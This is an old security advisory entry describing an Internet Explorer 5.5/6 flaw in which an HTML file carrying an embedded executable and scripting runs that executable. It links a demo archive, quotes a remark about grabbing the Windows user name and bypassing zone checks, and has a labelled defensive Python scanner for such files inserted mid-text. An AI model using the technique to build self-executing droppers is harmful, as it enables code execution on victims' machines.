26th Feb 2003 [SBWID-6026]
COMMAND
	IE Self-Executing HTML
SYSTEMS AFFECTED
	Tested IE5.5 and IE6
PROBLEM
	Thanks to http-equiv's findings:
	The following file is an html file comprising both scripting and an
	executable [*.exe].
	We inject scripting and an executable into the html file; the scripting
	is designed to point back to the executable in the html file and execute
	it. Provided the file is an html file proper, Internet Explorer 5.5 and
	6.0 will execute it.
	Because it is an html file proper, Internet Explorer opens it. The
	scripting inside is then parsed and fired. That scripting points back
	to the same executable file using our original codebase object from the
	year 2000, and because it is a self-executing html file, it executes!
	Tested on IE5.5 and IE6. Fully self-contained harmless *.exe:
	
	 http://www.malware.com/html.exe.zip
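
	A defensive check for the kind of file described above, as an added
	example that is not part of the original advisory: it flags any file,
	or any member of a ZIP archive, that is both HTML scripting and an
	embedded Windows PE image. Assumptions: the executable is a PE file, the
	scripting shows up as a script tag or an object tag with a codebase
	attribute, and all names and sample bytes are constructed for illustration.

```python
import io
import re
import struct
import zipfile

# Assumed markers (the page gives no markup): script tag, or object tag with codebase=.
SCRIPT_RE = re.compile(rb"<\s*script\b", re.I)
CODEBASE_RE = re.compile(rb"<\s*object\b[^>]*\bcodebase\s*=", re.I | re.S)
MAX_MEMBER = 16 * 1024 * 1024  # skip members declaring more than 16 MiB

def find_pe_images(data: bytes) -> list:
    """Offsets of every 'MZ' header whose e_lfanew field points at 'PE\\0\\0'."""
    offsets, pos = [], data.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(data):
            (e_lfanew,) = struct.unpack_from("<I", data, pos + 0x3C)
            if data[pos + e_lfanew:pos + e_lfanew + 4] == b"PE\0\0":
                offsets.append(pos)
        pos = data.find(b"MZ", pos + 1)
    return offsets

def classify(data: bytes) -> dict:
    """Flag content that carries both a PE image and HTML scripting markup."""
    pe = find_pe_images(data)
    markup = bool(SCRIPT_RE.search(data) or CODEBASE_RE.search(data))
    return {"pe_offsets": pe, "markup": markup, "suspicious": bool(pe) and markup}

def scan_zip(blob: bytes) -> dict:
    """Classify each member of an in-memory ZIP; return only flagged members."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir() or info.file_size > MAX_MEMBER:
                continue
            verdict = classify(zf.read(info))
            if verdict["suspicious"]:
                hits[info.filename] = verdict
    return hits

# Constructed samples: a non-runnable header stub (MZ + PE signature only) and inert markup.
STUB_PE = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40) + b"PE\0\0"
SAMPLE_HTML = b'<html><script>/* constructed */</script><object codebase="sample.htm"></object></html>'

def build_sample_zip() -> bytes:
    """Constructed archive: one mixed HTML/PE member and one plain text member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("page.html", STUB_PE + SAMPLE_HTML)
        zf.writestr("readme.txt", b"plain text, constructed")
    return buf.getvalue()
```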
	
	UUEncoded archive
	
	2245 bytes
	
	 Update (02 March 2003)
	 ======
	Dror Shalev comments:
	.zip is the most important issue.
	The zip is the key point in this perfect demo by http-equiv.
	You can do more cool things with JScript, like getting the Windows user
	name (via document.location) or even running a regular EXE (TIF Enumeration),
	because the zip temp file runs without a Security Zone check.
SOLUTION
	?